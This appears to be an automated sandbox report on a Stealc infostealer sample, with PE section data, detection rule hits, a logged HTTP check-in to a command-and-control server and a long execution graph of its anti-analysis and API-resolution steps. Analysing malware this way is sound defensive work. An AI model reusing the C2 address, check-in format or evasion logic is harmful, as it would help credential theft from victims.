                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x25b0000x22800023189d882e7c51b76e068e125b5a6c6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x25e0000x2a90000x2004a3e00176ac5e4b3fef877fe7fa36404unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  ybzlaxoh0x5070000x19e0000x19da00a85548392885b4a6ec69fbb25a293f62False0.9951239753324267data7.954973653078467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  gchetgti0x6a50000x10000x4002fdbd5a697bc9af708654c95bcffbeb7False0.7490234375data5.95094527425675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x6a60000x30000x2200b626b62ab486cb4da99fb53899340592False0.014361213235294117DOS executable (COM)0.07484566876978713IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-10-27T01:22:05.157295+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.657121185.215.113.20680TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 27, 2024 01:22:03.862620115 CEST5712180192.168.2.6185.215.113.206
                                  Oct 27, 2024 01:22:03.868000031 CEST8057121185.215.113.206192.168.2.6
                                  Oct 27, 2024 01:22:03.868119955 CEST5712180192.168.2.6185.215.113.206
                                  Oct 27, 2024 01:22:03.868774891 CEST5712180192.168.2.6185.215.113.206
                                  Oct 27, 2024 01:22:03.874131918 CEST8057121185.215.113.206192.168.2.6
                                  Oct 27, 2024 01:22:04.783149958 CEST8057121185.215.113.206192.168.2.6
                                  Oct 27, 2024 01:22:04.783235073 CEST5712180192.168.2.6185.215.113.206
                                  Oct 27, 2024 01:22:04.871794939 CEST5712180192.168.2.6185.215.113.206
                                  Oct 27, 2024 01:22:04.877178907 CEST8057121185.215.113.206192.168.2.6
                                  Oct 27, 2024 01:22:05.157239914 CEST8057121185.215.113.206192.168.2.6
                                  Oct 27, 2024 01:22:05.157294989 CEST5712180192.168.2.6185.215.113.206
                                  Oct 27, 2024 01:22:08.651814938 CEST5712180192.168.2.6185.215.113.206

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 27, 2024 01:22:02.126739025 CEST53653501.1.1.1192.168.2.6

                                  HTTP Request Dependency Graph

                                  • 185.215.113.206

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.657121185.215.113.20680420C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 27, 2024 01:22:03.868774891 CEST90OUTGET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Oct 27, 2024 01:22:04.783149958 CEST203INHTTP/1.1 200 OK
                                  Date: Sat, 26 Oct 2024 23:22:04 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Oct 27, 2024 01:22:04.871794939 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----JJKFBFIJJECGCAAAFCBG
                                  Host: 185.215.113.206
                                  Content-Length: 210
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 46 42 36 41 35 32 35 32 33 35 35 37 34 32 31 37 39 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 2d 2d 0d 0a
                                  Data Ascii: ------JJKFBFIJJECGCAAAFCBGContent-Disposition: form-data; name="hwid"01FB6A525235574217965------JJKFBFIJJECGCAAAFCBGContent-Disposition: form-data; name="build"puma------JJKFBFIJJECGCAAAFCBG--
                                  Oct 27, 2024 01:22:05.157239914 CEST210INHTTP/1.1 200 OK
                                  Date: Sat, 26 Oct 2024 23:22:05 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:19:21:58
                                  Start date:26/10/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0xd0000
                                  File size:1'850'368 bytes
                                  MD5 hash:083803A310E16DF3E21777D07A5BE88A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2167881887.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:8.5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:9.7%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:24
                                    execution_graph 13439 e69f0 13484 d2260 13439->13484 13463 e6a64 13464 ea9b0 4 API calls 13463->13464 13465 e6a6b 13464->13465 13466 ea9b0 4 API calls 13465->13466 13467 e6a72 13466->13467 13468 ea9b0 4 API calls 13467->13468 13469 e6a79 13468->13469 13470 ea9b0 4 API calls 13469->13470 13471 e6a80 13470->13471 13636 ea8a0 13471->13636 13473 e6b0c 13640 e6920 GetSystemTime 13473->13640 13474 e6a89 13474->13473 13476 e6ac2 OpenEventA 13474->13476 13479 e6ad9 13476->13479 13480 e6af5 CloseHandle Sleep 13476->13480 13483 e6ae1 CreateEventA 13479->13483 13482 e6b0a 13480->13482 13482->13474 13483->13473 13837 d45c0 13484->13837 13486 d2274 13487 d45c0 2 API calls 13486->13487 13488 d228d 13487->13488 13489 d45c0 2 API calls 13488->13489 13490 d22a6 13489->13490 13491 d45c0 2 API calls 13490->13491 13492 d22bf 13491->13492 13493 d45c0 2 API calls 13492->13493 13494 d22d8 13493->13494 13495 d45c0 2 API calls 13494->13495 13496 d22f1 13495->13496 13497 d45c0 2 API calls 13496->13497 13498 d230a 13497->13498 13499 d45c0 2 API calls 13498->13499 13500 d2323 13499->13500 13501 d45c0 2 API calls 13500->13501 13502 d233c 13501->13502 13503 d45c0 2 API calls 13502->13503 13504 d2355 13503->13504 13505 d45c0 2 API calls 13504->13505 13506 d236e 13505->13506 13507 d45c0 2 API calls 13506->13507 13508 d2387 13507->13508 13509 d45c0 2 API calls 13508->13509 13510 d23a0 13509->13510 13511 d45c0 2 API calls 13510->13511 13512 d23b9 13511->13512 13513 d45c0 2 API calls 13512->13513 13514 d23d2 13513->13514 13515 d45c0 2 API calls 13514->13515 13516 d23eb 13515->13516 13517 d45c0 2 API calls 13516->13517 13518 d2404 13517->13518 13519 d45c0 2 API calls 13518->13519 13520 d241d 13519->13520 13521 d45c0 2 API calls 13520->13521 13522 d2436 13521->13522 13523 d45c0 2 API calls 13522->13523 13524 d244f 13523->13524 13525 d45c0 2 API calls 13524->13525 13526 d2468 13525->13526 13527 d45c0 2 API calls 13526->13527 13528 d2481 13527->13528 13529 d45c0 2 API calls 13528->13529 13530 d249a 13529->13530 13531 d45c0 2 API calls 13530->13531 13532 d24b3 13531->13532 13533 d45c0 2 API calls 13532->13533 13534 d24cc 13533->13534 13535 d45c0 2 API calls 13534->13535 13536 d24e5 13535->13536 13537 d45c0 2 API calls 13536->13537 13538 d24fe 13537->13538 13539 d45c0 2 API calls 13538->13539 13540 d2517 13539->13540 13541 d45c0 2 API calls 13540->13541 13542 d2530 13541->13542 13543 d45c0 2 API calls 13542->13543 13544 d2549 13543->13544 13545 d45c0 2 API calls 13544->13545 13546 d2562 13545->13546 13547 d45c0 2 API calls 13546->13547 13548 d257b 13547->13548 13549 d45c0 2 API calls 13548->13549 13550 d2594 13549->13550 13551 d45c0 2 API calls 13550->13551 13552 d25ad 13551->13552 13553 d45c0 2 API calls 13552->13553 13554 d25c6 13553->13554 13555 d45c0 2 API calls 13554->13555 13556 d25df 13555->13556 13557 d45c0 2 API calls 13556->13557 13558 d25f8 13557->13558 13559 d45c0 2 API calls 13558->13559 13560 d2611 13559->13560 13561 d45c0 2 API calls 13560->13561 13562 d262a 13561->13562 13563 d45c0 2 API calls 13562->13563 13564 d2643 13563->13564 13565 d45c0 2 API calls 13564->13565 13566 d265c 13565->13566 13567 d45c0 2 API calls 13566->13567 13568 d2675 13567->13568 13569 d45c0 2 API calls 13568->13569 13570 d268e 13569->13570 13571 e9860 13570->13571 13842 e9750 GetPEB 13571->13842 13573 e9868 13574 e987a 13573->13574 13575 e9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13573->13575 13578 e988c 21 API calls 13574->13578 13576 e9b0d 13575->13576 13577 e9af4 GetProcAddress 13575->13577 13579 e9b46 13576->13579 13580 e9b16 GetProcAddress GetProcAddress 13576->13580 13577->13576 13578->13575 13581 e9b4f GetProcAddress 13579->13581 13582 e9b68 13579->13582 13580->13579 13581->13582 13583 e9b89 13582->13583 13584 e9b71 GetProcAddress 13582->13584 13585 e9b92 GetProcAddress GetProcAddress 13583->13585 13586 e6a00 13583->13586 13584->13583 13585->13586 13587 ea740 13586->13587 13588 ea750 13587->13588 13589 e6a0d 13588->13589 13590 ea77e lstrcpy 13588->13590 13591 d11d0 13589->13591 13590->13589 13592 d11e8 13591->13592 13593 d120f ExitProcess 13592->13593 13594 d1217 13592->13594 13595 d1160 GetSystemInfo 13594->13595 13596 d117c ExitProcess 13595->13596 13597 d1184 13595->13597 13598 d1110 GetCurrentProcess VirtualAllocExNuma 13597->13598 13599 d1149 13598->13599 13600 d1141 ExitProcess 13598->13600 13843 d10a0 VirtualAlloc 13599->13843 13603 d1220 13847 e89b0 13603->13847 13606 d1249 __aulldiv 13607 d129a 13606->13607 13608 d1292 ExitProcess 13606->13608 13609 e6770 GetUserDefaultLangID 13607->13609 13610 e6792 13609->13610 13611 e67d3 13609->13611 13610->13611 13612 e67ad ExitProcess 13610->13612 13613 e67cb ExitProcess 13610->13613 13614 e67b7 ExitProcess 13610->13614 13615 e67a3 ExitProcess 13610->13615 13616 e67c1 ExitProcess 13610->13616 13617 d1190 13611->13617 13618 e78e0 3 API calls 13617->13618 13620 d119e 13618->13620 13619 d11cc 13624 e7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13619->13624 13620->13619 13621 e7850 3 API calls 13620->13621 13622 d11b7 13621->13622 13622->13619 13623 d11c4 ExitProcess 13622->13623 13625 e6a30 13624->13625 13626 e78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13625->13626 13627 e6a43 13626->13627 13628 ea9b0 13627->13628 13849 ea710 13628->13849 13630 ea9c1 lstrlen 13633 ea9e0 13630->13633 13631 eaa18 13850 ea7a0 13631->13850 13633->13631 13635 ea9fa lstrcpy lstrcat 13633->13635 13634 eaa24 13634->13463 13635->13631 13637 ea8bb 13636->13637 13638 ea90b 13637->13638 13639 ea8f9 lstrcpy 13637->13639 13638->13474 13639->13638 13854 e6820 13640->13854 13642 e698e 13643 e6998 sscanf 13642->13643 13883 ea800 13643->13883 13645 e69aa SystemTimeToFileTime SystemTimeToFileTime 13646 e69ce 13645->13646 13647 e69e0 13645->13647 13646->13647 13648 e69d8 ExitProcess 13646->13648 13649 e5b10 13647->13649 13650 e5b1d 13649->13650 13651 ea740 lstrcpy 13650->13651 13652 e5b2e 13651->13652 13885 ea820 lstrlen 13652->13885 13655 ea820 2 API calls 13656 e5b64 13655->13656 13657 ea820 2 API calls 13656->13657 13658 e5b74 13657->13658 13889 e6430 13658->13889 13661 ea820 2 API calls 13662 e5b93 13661->13662 13663 ea820 2 API calls 13662->13663 13664 e5ba0 13663->13664 13665 ea820 2 API calls 13664->13665 13666 e5bad 13665->13666 13667 ea820 2 API calls 13666->13667 13668 e5bf9 13667->13668 13898 d26a0 13668->13898 13676 e5cc3 13677 e6430 lstrcpy 13676->13677 13678 e5cd5 13677->13678 13679 ea7a0 lstrcpy 13678->13679 13680 e5cf2 13679->13680 13681 ea9b0 4 API calls 13680->13681 13682 e5d0a 13681->13682 13683 ea8a0 lstrcpy 13682->13683 13684 e5d16 13683->13684 13685 ea9b0 4 API calls 13684->13685 13686 e5d3a 13685->13686 13687 ea8a0 lstrcpy 13686->13687 13688 e5d46 13687->13688 13689 ea9b0 4 API calls 13688->13689 13690 e5d6a 13689->13690 13691 ea8a0 lstrcpy 13690->13691 13692 e5d76 13691->13692 13693 ea740 lstrcpy 13692->13693 13694 e5d9e 13693->13694 14624 e7500 GetWindowsDirectoryA 13694->14624 13697 ea7a0 lstrcpy 13698 e5db8 13697->13698 14634 d4880 13698->14634 13700 e5dbe 14779 e17a0 13700->14779 13702 e5dc6 13703 ea740 lstrcpy 13702->13703 13704 e5de9 13703->13704 13705 d1590 lstrcpy 13704->13705 13706 e5dfd 13705->13706 14795 d5960 13706->14795 13708 e5e03 14939 e1050 13708->14939 13710 e5e0e 13711 ea740 lstrcpy 13710->13711 13712 e5e32 13711->13712 13713 d1590 lstrcpy 13712->13713 13714 e5e46 13713->13714 13715 d5960 34 API calls 13714->13715 13716 e5e4c 13715->13716 14943 e0d90 13716->14943 13718 e5e57 13719 ea740 lstrcpy 13718->13719 13720 e5e79 13719->13720 13721 d1590 lstrcpy 13720->13721 13722 e5e8d 13721->13722 13723 d5960 34 API calls 13722->13723 13724 e5e93 13723->13724 14950 e0f40 13724->14950 13726 e5e9e 13727 d1590 lstrcpy 13726->13727 13728 e5eb5 13727->13728 14955 e1a10 13728->14955 13730 e5eba 13731 ea740 lstrcpy 13730->13731 13732 e5ed6 13731->13732 15299 d4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13732->15299 13734 e5edb 13735 d1590 lstrcpy 13734->13735 13736 e5f5b 13735->13736 15306 e0740 13736->15306 13738 e5f60 13739 ea740 lstrcpy 13738->13739 13740 e5f86 13739->13740 13741 d1590 lstrcpy 13740->13741 13742 e5f9a 13741->13742 13743 d5960 34 API calls 13742->13743 13838 d45d1 RtlAllocateHeap 13837->13838 13841 d4621 VirtualProtect 13838->13841 13841->13486 13842->13573 13844 d10c2 ctype 13843->13844 13845 d10fd 13844->13845 13846 d10e2 VirtualFree 13844->13846 13845->13603 13846->13845 13848 d1233 GlobalMemoryStatusEx 13847->13848 13848->13606 13849->13630 13851 ea7c2 13850->13851 13852 ea7ec 13851->13852 13853 ea7da lstrcpy 13851->13853 13852->13634 13853->13852 13855 ea740 lstrcpy 13854->13855 13856 e6833 13855->13856 13857 ea9b0 4 API calls 13856->13857 13858 e6845 13857->13858 13859 ea8a0 lstrcpy 13858->13859 13860 e684e 13859->13860 13861 ea9b0 4 API calls 13860->13861 13862 e6867 13861->13862 13863 ea8a0 lstrcpy 13862->13863 13864 e6870 13863->13864 13865 ea9b0 4 API calls 13864->13865 13866 e688a 13865->13866 13867 ea8a0 lstrcpy 13866->13867 13868 e6893 13867->13868 13869 ea9b0 4 API calls 13868->13869 13870 e68ac 13869->13870 13871 ea8a0 lstrcpy 13870->13871 13872 e68b5 13871->13872 13873 ea9b0 4 API calls 13872->13873 13874 e68cf 13873->13874 13875 ea8a0 lstrcpy 13874->13875 13876 e68d8 13875->13876 13877 ea9b0 4 API calls 13876->13877 13878 e68f3 13877->13878 13879 ea8a0 lstrcpy 13878->13879 13880 e68fc 13879->13880 13881 ea7a0 lstrcpy 13880->13881 13882 e6910 13881->13882 13882->13642 13884 ea812 13883->13884 13884->13645 13887 ea83f 13885->13887 13886 e5b54 13886->13655 13887->13886 13888 ea87b lstrcpy 13887->13888 13888->13886 13890 ea8a0 lstrcpy 13889->13890 13891 e6443 13890->13891 13892 ea8a0 lstrcpy 13891->13892 13893 e6455 13892->13893 13894 ea8a0 lstrcpy 13893->13894 13895 e6467 13894->13895 13896 ea8a0 lstrcpy 13895->13896 13897 e5b86 13896->13897 13897->13661 13899 d45c0 2 API calls 13898->13899 13900 d26b4 13899->13900 13901 d45c0 2 API calls 13900->13901 13902 d26d7 13901->13902 13903 d45c0 2 API calls 13902->13903 13904 d26f0 13903->13904 13905 d45c0 2 API calls 13904->13905 13906 d2709 13905->13906 13907 d45c0 2 API calls 13906->13907 13908 d2736 13907->13908 13909 d45c0 2 API calls 13908->13909 13910 d274f 13909->13910 13911 d45c0 2 API calls 13910->13911 13912 d2768 13911->13912 13913 d45c0 2 API calls 13912->13913 13914 d2795 13913->13914 13915 d45c0 2 API calls 13914->13915 13916 d27ae 13915->13916 13917 d45c0 2 API calls 13916->13917 13918 d27c7 13917->13918 13919 d45c0 2 API calls 13918->13919 13920 d27e0 13919->13920 13921 d45c0 2 API calls 13920->13921 13922 d27f9 13921->13922 13923 d45c0 2 API calls 13922->13923 13924 d2812 13923->13924 13925 d45c0 2 API calls 13924->13925 13926 d282b 13925->13926 13927 d45c0 2 API calls 13926->13927 13928 d2844 13927->13928 13929 d45c0 2 API calls 13928->13929 13930 d285d 13929->13930 13931 d45c0 2 API calls 13930->13931 13932 d2876 13931->13932 13933 d45c0 2 API calls 13932->13933 13934 d288f 13933->13934 13935 d45c0 2 API calls 13934->13935 13936 d28a8 13935->13936 13937 d45c0 2 API calls 13936->13937 13938 d28c1 13937->13938 13939 d45c0 2 API calls 13938->13939 13940 d28da 13939->13940 13941 d45c0 2 API calls 13940->13941 13942 d28f3 13941->13942 13943 d45c0 2 API calls 13942->13943 13944 d290c 13943->13944 13945 d45c0 2 API calls 13944->13945 13946 d2925 13945->13946 13947 d45c0 2 API calls 13946->13947 13948 d293e 13947->13948 13949 d45c0 2 API calls 13948->13949 13950 d2957 13949->13950 13951 d45c0 2 API calls 13950->13951 13952 d2970 13951->13952 13953 d45c0 2 API calls 13952->13953 13954 d2989 13953->13954 13955 d45c0 2 API calls 13954->13955 13956 d29a2 13955->13956 13957 d45c0 2 API calls 13956->13957 13958 d29bb 13957->13958 13959 d45c0 2 API calls 13958->13959 13960 d29d4 13959->13960 13961 d45c0 2 API calls 13960->13961 13962 d29ed 13961->13962 13963 d45c0 2 API calls 13962->13963 13964 d2a06 13963->13964 13965 d45c0 2 API calls 13964->13965 13966 d2a1f 13965->13966 13967 d45c0 2 API calls 13966->13967 13968 d2a38 13967->13968 13969 d45c0 2 API calls 13968->13969 13970 d2a51 13969->13970 13971 d45c0 2 API calls 13970->13971 13972 d2a6a 13971->13972 13973 d45c0 2 API calls 13972->13973 13974 d2a83 13973->13974 13975 d45c0 2 API calls 13974->13975 13976 d2a9c 13975->13976 13977 d45c0 2 API calls 13976->13977 13978 d2ab5 13977->13978 13979 d45c0 2 API calls 13978->13979 13980 d2ace 13979->13980 13981 d45c0 2 API calls 13980->13981 13982 d2ae7 13981->13982 13983 d45c0 2 API calls 13982->13983 13984 d2b00 13983->13984 13985 d45c0 2 API calls 13984->13985 13986 d2b19 13985->13986 13987 d45c0 2 API calls 13986->13987 13988 d2b32 13987->13988 13989 d45c0 2 API calls 13988->13989 13990 d2b4b 13989->13990 13991 d45c0 2 API calls 13990->13991 13992 d2b64 13991->13992 13993 d45c0 2 API calls 13992->13993 13994 d2b7d 13993->13994 13995 d45c0 2 API calls 13994->13995 13996 d2b96 13995->13996 13997 d45c0 2 API calls 13996->13997 13998 d2baf 13997->13998 13999 d45c0 2 API calls 13998->13999 14000 d2bc8 13999->14000 14001 d45c0 2 API calls 14000->14001 14002 d2be1 14001->14002 14003 d45c0 2 API calls 14002->14003 14004 d2bfa 14003->14004 14005 d45c0 2 API calls 14004->14005 14006 d2c13 14005->14006 14007 d45c0 2 API calls 14006->14007 14008 d2c2c 14007->14008 14009 d45c0 2 API calls 14008->14009 14010 d2c45 14009->14010 14011 d45c0 2 API calls 14010->14011 14012 d2c5e 14011->14012 14013 d45c0 2 API calls 14012->14013 14014 d2c77 14013->14014 14015 d45c0 2 API calls 14014->14015 14016 d2c90 14015->14016 14017 d45c0 2 API calls 14016->14017 14018 d2ca9 14017->14018 14019 d45c0 2 API calls 14018->14019 14020 d2cc2 14019->14020 14021 d45c0 2 API calls 14020->14021 14022 d2cdb 14021->14022 14023 d45c0 2 API calls 14022->14023 14024 d2cf4 14023->14024 14025 d45c0 2 API calls 14024->14025 14026 d2d0d 14025->14026 14027 d45c0 2 API calls 14026->14027 14028 d2d26 14027->14028 14029 d45c0 2 API calls 14028->14029 14030 d2d3f 14029->14030 14031 d45c0 2 API calls 14030->14031 14032 d2d58 14031->14032 14033 d45c0 2 API calls 14032->14033 14034 d2d71 14033->14034 14035 d45c0 2 API calls 14034->14035 14036 d2d8a 14035->14036 14037 d45c0 2 API calls 14036->14037 14038 d2da3 14037->14038 14039 d45c0 2 API calls 14038->14039 14040 d2dbc 14039->14040 14041 d45c0 2 API calls 14040->14041 14042 d2dd5 14041->14042 14043 d45c0 2 API calls 14042->14043 14044 d2dee 14043->14044 14045 d45c0 2 API calls 14044->14045 14046 d2e07 14045->14046 14047 d45c0 2 API calls 14046->14047 14048 d2e20 14047->14048 14049 d45c0 2 API calls 14048->14049 14050 d2e39 14049->14050 14051 d45c0 2 API calls 14050->14051 14052 d2e52 14051->14052 14053 d45c0 2 API calls 14052->14053 14054 d2e6b 14053->14054 14055 d45c0 2 API calls 14054->14055 14056 d2e84 14055->14056 14057 d45c0 2 API calls 14056->14057 14058 d2e9d 14057->14058 14059 d45c0 2 API calls 14058->14059 14060 d2eb6 14059->14060 14061 d45c0 2 API calls 14060->14061 14062 d2ecf 14061->14062 14063 d45c0 2 API calls 14062->14063 14064 d2ee8 14063->14064 14065 d45c0 2 API calls 14064->14065 14066 d2f01 14065->14066 14067 d45c0 2 API calls 14066->14067 14068 d2f1a 14067->14068 14069 d45c0 2 API calls 14068->14069 14070 d2f33 14069->14070 14071 d45c0 2 API calls 14070->14071 14072 d2f4c 14071->14072 14073 d45c0 2 API calls 14072->14073 14074 d2f65 14073->14074 14075 d45c0 2 API calls 14074->14075 14076 d2f7e 14075->14076 14077 d45c0 2 API calls 14076->14077 14078 d2f97 14077->14078 14079 d45c0 2 API calls 14078->14079 14080 d2fb0 14079->14080 14081 d45c0 2 API calls 14080->14081 14082 d2fc9 14081->14082 14083 d45c0 2 API calls 14082->14083 14084 d2fe2 14083->14084 14085 d45c0 2 API calls 14084->14085 14086 d2ffb 14085->14086 14087 d45c0 2 API calls 14086->14087 14088 d3014 14087->14088 14089 d45c0 2 API calls 14088->14089 14090 d302d 14089->14090 14091 d45c0 2 API calls 14090->14091 14092 d3046 14091->14092 14093 d45c0 2 API calls 14092->14093 14094 d305f 14093->14094 14095 d45c0 2 API calls 14094->14095 14096 d3078 14095->14096 14097 d45c0 2 API calls 14096->14097 14098 d3091 14097->14098 14099 d45c0 2 API calls 14098->14099 14100 d30aa 14099->14100 14101 d45c0 2 API calls 14100->14101 14102 d30c3 14101->14102 14103 d45c0 2 API calls 14102->14103 14104 d30dc 14103->14104 14105 d45c0 2 API calls 14104->14105 14106 d30f5 14105->14106 14107 d45c0 2 API calls 14106->14107 14108 d310e 14107->14108 14109 d45c0 2 API calls 14108->14109 14110 d3127 14109->14110 14111 d45c0 2 API calls 14110->14111 14112 d3140 14111->14112 14113 d45c0 2 API calls 14112->14113 14114 d3159 14113->14114 14115 d45c0 2 API calls 14114->14115 14116 d3172 14115->14116 14117 d45c0 2 API calls 14116->14117 14118 d318b 14117->14118 14119 d45c0 2 API calls 14118->14119 14120 d31a4 14119->14120 14121 d45c0 2 API calls 14120->14121 14122 d31bd 14121->14122 14123 d45c0 2 API calls 14122->14123 14124 d31d6 14123->14124 14125 d45c0 2 API calls 14124->14125 14126 d31ef 14125->14126 14127 d45c0 2 API calls 14126->14127 14128 d3208 14127->14128 14129 d45c0 2 API calls 14128->14129 14130 d3221 14129->14130 14131 d45c0 2 API calls 14130->14131 14132 d323a 14131->14132 14133 d45c0 2 API calls 14132->14133 14134 d3253 14133->14134 14135 d45c0 2 API calls 14134->14135 14136 d326c 14135->14136 14137 d45c0 2 API calls 14136->14137 14138 d3285 14137->14138 14139 d45c0 2 API calls 14138->14139 14140 d329e 14139->14140 14141 d45c0 2 API calls 14140->14141 14142 d32b7 14141->14142 14143 d45c0 2 API calls 14142->14143 14144 d32d0 14143->14144 14145 d45c0 2 API calls 14144->14145 14146 d32e9 14145->14146 14147 d45c0 2 API calls 14146->14147 14148 d3302 14147->14148 14149 d45c0 2 API calls 14148->14149 14150 d331b 14149->14150 14151 d45c0 2 API calls 14150->14151 14152 d3334 14151->14152 14153 d45c0 2 API calls 14152->14153 14154 d334d 14153->14154 14155 d45c0 2 API calls 